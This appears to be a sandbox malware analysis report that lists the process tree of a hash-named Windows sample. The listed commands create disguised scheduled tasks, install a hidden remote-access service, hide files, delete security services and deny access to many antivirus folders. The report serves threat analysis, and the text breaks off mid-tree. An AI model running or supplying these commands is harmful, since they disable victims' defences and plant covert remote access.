PID 1992 wrote to memory of 1760	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	39
PID 1992 wrote to memory of 1760	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	39
PID 1992 wrote to memory of 1464	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	38
PID 1992 wrote to memory of 1464	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	38
PID 1992 wrote to memory of 1464	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	38
PID 1992 wrote to memory of 1464	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	38
PID 1992 wrote to memory of 1704	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	41
PID 1992 wrote to memory of 1704	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	41
PID 1992 wrote to memory of 1704	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	41
PID 1992 wrote to memory of 1704	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	41
PID 1464 wrote to memory of 836	1464	cmd.exe	43
PID 1464 wrote to memory of 836	1464	cmd.exe	43
PID 1464 wrote to memory of 836	1464	cmd.exe	43
PID 1464 wrote to memory of 836	1464	cmd.exe	43
PID 1704 wrote to memory of 624	1704	cmd.exe	44
PID 1704 wrote to memory of 624	1704	cmd.exe	44
PID 1704 wrote to memory of 624	1704	cmd.exe	44
PID 1704 wrote to memory of 624	1704	cmd.exe	44
PID 1760 wrote to memory of 1712	1760	cheat.exe	46
PID 1760 wrote to memory of 1712	1760	cheat.exe	46
PID 1760 wrote to memory of 1712	1760	cheat.exe	46
PID 1760 wrote to memory of 1712	1760	cheat.exe	46
PID 1992 wrote to memory of 1072	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	79

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1676	attrib.exe
2876	attrib.exe
2868	attrib.exe
2848	attrib.exe
604	attrib.exe

C:\Users\Admin\AppData\Local\Temp\22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
"C:\Users\Admin\AppData\Local\Temp\22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe"
1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Adds Run key to start application
- Modifies WinLogon
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 15
  2⤵
  - Creates scheduled task(s)
  PID:1772
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1764
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:956
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1088
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:432
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:1716
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:812
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1192
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2020
      - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        6⤵
        Modifies file permissions
        
        PID:1716
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:316
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:604
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:1676
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        
        PID:1548
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        
        PID:2344
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        
        PID:2376
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:904
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Programdata\Install\del.bat
      4⤵
      PID:2452
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:2484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1464
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    PID:836
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1760
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1712
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      Executes dropped EXE
      PID:1600
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:1696
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\programdata\microsoft\temp\H.bat
      4⤵
      Drops file in Drivers directory
      PID:2496
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      4⤵
      Creates scheduled task(s)
      PID:2520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    PID:624
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  PID:1072
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    PID:1972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:700
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:1988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:1364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:1144
- - C:\Windows\SysWOW64\sc.exe
    sc stop bytefenceservice
    3⤵
    PID:1112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:520
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    PID:976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  PID:1184
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    PID:1072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    PID:1048
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    PID:1304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:1180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  PID:1840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
  2⤵
  PID:1120
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    PID:588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1600
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
  2⤵
  PID:1484
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
  2⤵
  PID:952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
  2⤵
  PID:1208
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1628
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    3⤵
    - Modifies file permissions
    PID:1216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
  2⤵
  PID:980
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
  2⤵
  PID:848
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
  2⤵
  PID:1208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:632
- - C:\Windows\SysWOW64\icacls.exe
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
  2⤵
  PID:1500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
  2⤵
  PID:1624
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
  2⤵
  PID:964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
  2⤵
  PID:2020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
  2⤵
  PID:2116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
  2⤵
  PID:2268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2416
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2560
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2744
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
  2⤵
  PID:2784
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2844
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2984
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:588
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1004
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2584
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1416
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2508
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2812
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2860
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2888
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2904
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3040
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3008
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3068
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3036
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2228
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2248
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:2204
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2288
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2216
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  2⤵
  PID:2188
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2160
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:1668
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1448
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1488
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1140
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1108
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1928
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:992
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2540
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2576
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2564
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1416
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:2604
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2668
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2828
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:2748
- C:\ProgramData\RealtekHD\taskhostw.exe
  C:\ProgramData\RealtekHD\taskhostw.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2840
- - C:\Programdata\WindowsTask\winlogon.exe
    C:\Programdata\WindowsTask\winlogon.exe
    3⤵
    - Executes dropped EXE
    PID:2696
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /C schtasks /query /fo list
      4⤵
      PID:2596
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        5⤵
        
        PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /flushdns
    3⤵
    PID:2972
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /flushdns
      4⤵
      Gathers network information
      PID:2984
- - C:\Windows\system32\cmd.exe
